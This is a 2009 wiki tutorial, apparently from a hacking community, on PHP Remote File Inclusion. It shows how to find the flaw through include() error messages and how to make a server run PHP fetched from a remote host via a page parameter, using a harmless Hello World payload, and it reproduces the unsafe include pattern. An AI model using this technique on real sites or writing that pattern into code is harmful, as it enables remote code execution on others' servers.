RFI TutorialThis is a featured page

In this article I will describe the following.
What is RFI?
What can it do?
What's happening?
How does one write a vulnerable script like this?
and probably some other shit.




This article is written with PHP example scripts and errors.

What is RFI?

Small Definition: RFI, (R)emote (F)ile (I)inclusion, is a small but deadly vulnerability found in a major part of the web today.
It allows one to (include) (remote) (files).


Well, lets start off by giving a small example.
You are browsing a site and notice in the URL that one of the GET arguments is index.php?page=index.
You click on the "news" link in the navigation and it changes to index.php?page=news.
So you do some playing around and change the name to index.php?page=abcd and you get an error.

[Now lets start describing this thing]

Error: Warning: include(abcd.txt) [function.include]: failed to open stream: No such file or directory in /web/public_html/script.php on line 192

Alright, at first glance alot of newbies would just look over this and not notice they found a RFI vulnerability.

This tiny error tells me a little bit of information.

The Path: /web/public_html/
It just let me know the full path to all there web files, nothing special for this article but can really help out if you plan on gaining more access.

The Function: [function.include]
It just told me that it is trying to "include(abcd.txt)"

Notice that in the small example we got this error by passing page=abcd. So in the background you can expect the PHP script to be doing something as the following.

include("{$_GET['page']}.txt"Wink;

With this type of script you are sort of limited on Local File Inclusion but for Remote File Inclusion this is wonderful.
????: CyberXtreme - Exclusive Hacking & Warez Community http://cyberxtreme.info/board//showthread.php?t=4041

By default a .txt document is received with a content type of text/plain, more on this in a second.

So now lets actually inject something. We are going to inject a small piece of code that just prints out Hello World 10 times on the vulnerable page.

The script:
<?PHP for ($i = 0; $i < 10; $i++) { echo "Hello World"; } ?> // This script will enter a loop increment the value of the variable $i by one each loop while printing out the words "Hello World"

Storing:
Now we need to stick this small script in a .txt file, the reason being is that I had just described above. a .txt file will not parse the file as PHP there for printing out the PHP code as normal text.
Now just upload this somewhere that you can access it from an IP or URL such as http://domain.com...

Now we need to go back to the vulnerable script we found and change the value to the location of your text file.
In this case we change it to index.php?page=http://domain.com/script

The reason that we left out the .txt is of what we noticed in the error.
The error is appending the .txt format to the page argument.

So when we send this the vulnerable script should be doing something like this
include("http://domain.com/script.txt"Wink; // including your remote file that has the PHP script in it.

Even though this script is stored in a plain text document, it is being passed threw the include() function in PHP.
This function is going to parse the PHP within this text file no matter what format the file was originally in.

So now looking at the page we should notice that it prints out "Hello World" 10 times. That means we successfully inject a PHP script and the server parsed it.

Congratulations!

Why would someone be vulnerable to this?
There are alot of people out there that program without any knowledge of security at all.
They write this small easy script <?PHP include("{$_GET['page']}.txt"Wink; ?> thinking that its going to save them alot of problems in the future.

Now they can simply create file.txt and link to index.php?page=file and it will include and parse that script no problem.


No user avatar
Canakar 		Latest page update: made by Canakar , Feb 19 2009, 4:34 PM EST (about this update About This Update Canakar Edited by Canakar

No content added or deleted.
- complete history)
Keyword tags: General RFI Tutorial
More Info: links to this page

Threads for this page

There are no threads for this page.  Be the first to start a new thread.

Related Content

  (what's this?Related ContentThanks to keyword tags, links to related pages and threads are added to the bottom of your pages. Up to 15 links are shown, determined by matching tags and by how recently the content was updated; keeping the most current at the top. Share your feedback on Wetpaint Central.)
XSS Tutorial [INTRO]